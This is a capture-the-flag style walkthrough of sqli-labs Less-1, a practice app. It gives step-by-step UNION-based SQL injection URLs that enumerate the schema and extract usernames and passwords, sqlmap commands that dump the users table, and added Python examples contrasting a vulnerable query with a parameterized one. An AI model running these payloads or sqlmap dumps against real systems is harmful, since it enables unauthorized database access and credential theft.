Sqli-labs_Less-1_GET-Error Based-Single Quotes

Lab URL: http://web-labs.rinue.top/sqli-labs/Less-1/

0x01 Manual injection

First open the URL; a page like this appears:

(screenshot)

Following the hint

Please input the ID as parameter with numeric value

add the parameter in the address bar:

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1

This loads a page that displays a login name and password:

(screenshot)

Append a single quote to the parameter to check whether an injection point exists:

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1'

The following error message appears:

(screenshot)

which shows that an injection point exists.

Next, guess the number of columns:

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1' and 1=2 union select 1 -- '
http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%201%20--%20%27

Error:

The used SELECT statements have a different number of columns

Continue:

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2 -- '
http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%201,2%20--%20%27

Still the same error as above.

Continue:

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,3 -- '

Now:

(screenshot)

This shows the column count has been found: there are 3 columns.

The column count can also be determined with ORDER BY:

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20order%20by%201%20--%20%27
http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20order%20by%202%20--%20%27
http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20order%20by%203%20--%20%27
With order by 3 there is no error.
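Both checks above (a stray quote producing a syntax error, and counting columns with UNION SELECT) follow directly from the way the lab splices the id parameter into its query. The following Python example is added here and is not part of the original write-up or of sqli-labs: it models the lab's query shape on an in-memory SQLite table with constructed rows (the `SELECT * FROM users WHERE id='...' LIMIT 0,1` template and the table contents are assumptions, since the page does not show the PHP source), and sets the injectable lookup beside a parameterized one that also enforces the "numeric ID" rule from the lab's own hint.

```python
import re
import sqlite3

# Constructed sample rows standing in for the lab's security.users table.
SAMPLE_USERS = [
    (1, "Dumb", "Dumb"),
    (2, "Angelina", "I-kill-you"),
    (3, "Dummy", "p@ssword"),
]

# Assumed shape of the lab's query; the id value is spliced between quotes.
QUERY_TEMPLATE = "SELECT * FROM users WHERE id='%s' LIMIT 0,1"


def open_db():
    """Create an in-memory database holding the constructed sample table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, id_param):
    """The injectable pattern: the raw GET parameter is formatted into the SQL."""
    sql = QUERY_TEMPLATE % id_param
    return conn.execute(sql).fetchone()


def lookup_safe(conn, id_param):
    """Hardened lookup: enforce the numeric contract, then bind the value."""
    if not re.fullmatch(r"[0-9]{1,10}", id_param):
        return None  # reject anything that is not a plain integer
    return conn.execute(
        "SELECT * FROM users WHERE id=? LIMIT 0,1", (int(id_param),)
    ).fetchone()


def probe(conn, lookup, id_param):
    """Run one lookup and report ('row', row) or ('error', message)."""
    try:
        return ("row", lookup(conn, id_param))
    except sqlite3.Error as exc:
        return ("error", str(exc))


# The inputs used in the write-up, with the ?id= value URL-decoded.
PROBES = {
    "baseline": "1",
    "single_quote": "1'",
    "union_2_columns": "1' and 1=2 union select 1,2 -- '",
    "union_3_columns": "1' and 1=2 union select 1,2,3 -- '",
}


def compare_behaviour():
    """Return {probe_name: (vulnerable_result, safe_result)} for every input."""
    conn = open_db()
    results = {
        name: (probe(conn, lookup_vulnerable, value), probe(conn, lookup_safe, value))
        for name, value in PROBES.items()
    }
    conn.close()
    return results


if __name__ == "__main__":
    for name, (vuln, safe) in compare_behaviour().items():
        print(f"{name:16s} vulnerable={vuln}  safe={safe}")
```

Run stand-alone, the vulnerable lookup reproduces the write-up's sequence: the lone quote raises a parse error, the two-column UNION fails with SQLite's "same number of result columns" complaint (the counterpart of the MySQL message quoted above), and the three-column UNION returns the attacker-chosen row (1, 2, 3) instead of a user. The parameterized lookup returns the same baseline row and simply yields no result for the other three inputs, because the regex rejects them before any SQL is built.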

Then database functions can be used to retrieve some information:

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%201,database(),version()%20--%20%27

(screenshot)

The current database name is security.

The database server version is 5.5.57_log; after a Baidu search, this turns out to be MySQL.

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%201,database(),user()%20--%20%27

(screenshot)

This gives the name of the current database user.

Now start retrieving the table names under security:

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%201,TABLE_NAME,user()%20from%20INFORMATION_SCHEMA.COLUMNS%20where%20TABLE_SCHEMA=%27security%27%20--%20%27

(screenshot)

Only one table is shown.

LIMIT can be added to show the other tables; LIMIT m,n means start from row m+1 and take n rows:

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%201,3,TABLE_NAME%20from%20INFORMATION_SCHEMA.COLUMNS%20where%20TABLE_SCHEMA=%27security%27%20limit%203,10%20--%20%27

(screenshot)

However, this is too tedious.

group_concat() can be used to join all the table names together.

I. The concat() function

1. Purpose: joins several strings into one string.

2. Syntax: concat(str1, str2, ...)

Returns the string produced by concatenating the arguments; if any argument is NULL, the result is NULL.

3. Syntax: concat(str1, separator, str2, separator, ...)

Returns the concatenated string with separators in between; if any argument is NULL, the result is NULL.

II. The concat_ws() function

1. Purpose: like concat(), joins several strings into one string, but the separator is specified once (concat_ws stands for "concat with separator").

2. Syntax: concat_ws(separator, str1, str2, ...)

Note: the first argument is the separator. The separator must not be NULL; if it is NULL, the result is NULL.

III. The group_concat() function

1. Purpose: joins the values within one group produced by GROUP BY and returns a single string.

2. Syntax: group_concat([distinct] field_to_join [order by sort_field asc/desc] [separator 'separator'])

Note: distinct removes duplicate values; to sort the values in the result, use an order by clause; separator is a string value and defaults to a comma.
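To make the NULL rules above concrete, the following Python example (added here; not from the original post or from MySQL itself) registers MySQL-style concat() and concat_ws() as user-defined functions on an in-memory SQLite connection and runs them over constructed rows that include a NULL password. SQLite's two-argument group_concat(expr, sep) stands in for MySQL's SEPARATOR clause. The table and rows are constructed; that concat_ws() skips NULL arguments after the separator is MySQL's documented behaviour rather than something the page states.

```python
import sqlite3

# Constructed rows modelled on the lab's users table; the NULL password
# is deliberate so the NULL rule of each function is visible.
ROWS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", None)]


def mysql_concat(*args):
    """MySQL CONCAT(): concatenates all arguments; NULL if any argument is NULL."""
    if any(a is None for a in args):
        return None
    return "".join(str(a) for a in args)


def mysql_concat_ws(sep, *args):
    """MySQL CONCAT_WS(): the first argument is the separator. A NULL separator
    gives NULL; NULL values among the remaining arguments are skipped."""
    if sep is None:
        return None
    return str(sep).join(str(a) for a in args if a is not None)


def open_demo_db():
    """In-memory SQLite database with the constructed rows and the two
    MySQL-style scalar functions registered (-1 = any number of arguments)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    conn.create_function("concat", -1, mysql_concat)
    conn.create_function("concat_ws", -1, mysql_concat_ws)
    return conn


def run_demo():
    """Evaluate the three functions over the sample table and return the results."""
    conn = open_demo_db()
    concat_rows = [r[0] for r in conn.execute(
        "SELECT concat(username, ':', password) FROM users ORDER BY id")]
    concat_ws_rows = [r[0] for r in conn.execute(
        "SELECT concat_ws(' ', username, password) FROM users ORDER BY id")]
    # SQLite's group_concat(expr, sep) plays the role of MySQL's
    # group_concat(expr SEPARATOR sep); both skip NULL values.
    (grouped,) = conn.execute(
        "SELECT group_concat(concat(username, ':', password), ' ') FROM users"
    ).fetchone()
    # DISTINCT removes duplicates; the doubled-up subquery has every name twice.
    (distinct_names,) = conn.execute(
        "SELECT group_concat(DISTINCT username) FROM "
        "(SELECT username FROM users UNION ALL SELECT username FROM users)"
    ).fetchone()
    conn.close()
    return {
        "concat": concat_rows,
        "concat_ws": concat_ws_rows,
        "group_concat": grouped,
        "group_concat_distinct": distinct_names,
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value!r}")
```

The row with the NULL password shows the difference that matters: concat(username, ':', password) collapses to NULL for that row and therefore drops out of group_concat entirely, while concat_ws(' ', username, password) still yields "Dummy". That is why the write-up's last two queries, which wrap the columns in concat() or concat_ws() before grouping, can return different row counts when a column contains NULLs.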

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%201,2,group_concat(distinct%20TABLE_NAME%20separator%20%22%20%22)%20from%20INFORMATION_SCHEMA.COLUMNS%20where%20TABLE_SCHEMA=%27security%27%20--%20%27

(screenshot)

Retrieve the columns of the users table:

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%201,2,group_concat(column_name%20separator%20%22%20%22)%20from%20INFORMATION_SCHEMA.COLUMNS%20where%20TABLE_SCHEMA=%27security%27%20%20and%20TABLE_NAME=%27users%27--%20%27

(screenshot)

Then retrieve the values of those columns:

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%201,2,group_concat(username,%27:%27,password)%20from%20security.users--%20%27

(screenshot)

http://web-labs.rinue.top/sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%201,2,group_concat(concat_ws(%27%20%20%27,username,password))%20from%20security.users--%20%27

(screenshot)

Method 2: sqlmap

sqlmap -u "web-labs.rinue.top/sqli-labs/Less-1/?id=1" --batch -D "security" --tables
Database: security                                                                       
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

Dump the users table:

sqlmap -u "web-labs.rinue.top/sqli-labs/Less-1/?id=1" --batch -D "security" -T users --dump
Database: security                                                                       
Table: users
[13 entries]
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
| 1  | Dumb     | Dumb       |
| 2  | Angelina | I-kill-you |
| 3  | Dummy    |    |
| 4  | secure   | crappy     |
| 5  | stupid   | stupidity  |
| 6  | superman | genious    |
| 7  | batman   | mob!le     |
| 8  | admin    | admin      |
| 9  | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
